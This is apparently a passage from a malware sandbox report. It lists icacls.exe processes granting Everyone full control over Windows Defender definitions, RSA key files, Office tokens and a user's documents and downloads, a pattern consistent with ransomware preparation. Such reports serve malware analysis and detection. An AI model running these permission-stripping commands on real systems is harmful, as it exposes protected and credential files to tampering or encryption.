- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1612
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07985c13\DMI5BF4.tmp.log.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:988
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1940
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1540
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2036
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1692
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4C554097-2FB0-402F-B4E6-871551E5F5E1}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1156
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73E16F2A-F71A-4C25-9888-31BA6C186998}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1944
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{B16DFA11-8161-4746-8090-B3D178903CF7}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1776
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2032
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1700
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:816
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1140
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1720
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1092
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1524
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1532
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1872
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:156
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1944
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1776
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:988
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1700
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1516
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1460
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1208
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1692
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1416
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1532
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1872
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_9904da6a-19c3-4a6e-a0a9-89cb601578fd /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1584
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1644
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1812
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1816
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:896
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BlockSelect.dwg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompletePublish.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConnectUnprotect.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:584
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\EnterEdit.tif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\GetFind.emz /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InvokeAssert.cr2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InvokeFormat.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinClear.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:952
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinDisconnect.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1532
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinInitialize.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1240
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinRename.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ProtectRepair.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1884
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ReadSearch.dwg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1924
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ResetUnregister.dib /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeUnlock.emf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ShowSwitch.emz /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\StopProtect.dwg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:988
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ApproveConvertFrom.xls /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\BlockConvert.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\BlockTest.asf /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\CompareUnregister.svg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:640
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\CompressUnregister.pps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DenyPop.mpeg3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1692
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\FindUninstall.ods /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1876
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ResetFormat.wpl /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RevokeConvertTo.zip /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SendStop.emz /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1476
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:612
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1644
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1092
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1932
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1140
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1240
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1540
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1544
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\USA.gov.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1928
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Suggested Sites.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Web Slice Gallery.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1012
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CheckpointRequest.avi /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ClearCompress.mhtml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CloseEdit.jtx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ConvertFromUnregister.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1680
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ConvertToCopy.emf /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DenyWrite.mpp /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DismountHide.mpeg2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\EnterDeny.3gp /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1440
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\FindPop.mpeg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\InstallPop.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MeasureMount.jpeg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1744
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MergeSet.wmv /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MoveRestart.xht /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:952
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\OpenUnpublish.xls /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ReceiveResolve.mpeg3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ReceiveRevoke.dotx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1200
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RegisterConfirm.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1776
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RepairDebug.rar /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1928
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RepairStart.xla /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RepairUnlock.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RequestMerge.asx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RestartGrant.ttf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1476
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RestartSwitch.ppsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1720
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ShowDebug.php /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:736
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SkipReceive.otf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\StartInstall.7z /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1624
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\TestSave.wpl /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:584
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnblockComplete.css /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UninstallRepair.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1696
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Are.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1876
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CheckpointRestart.docm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CheckpointTrace.pot /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CloseWait.vsdm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:524
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CompleteRestart.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1140
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CompressDisconnect.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1932
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugApprove.potm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1240
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugAssert.doc /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\EnableAssert.ppsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:612
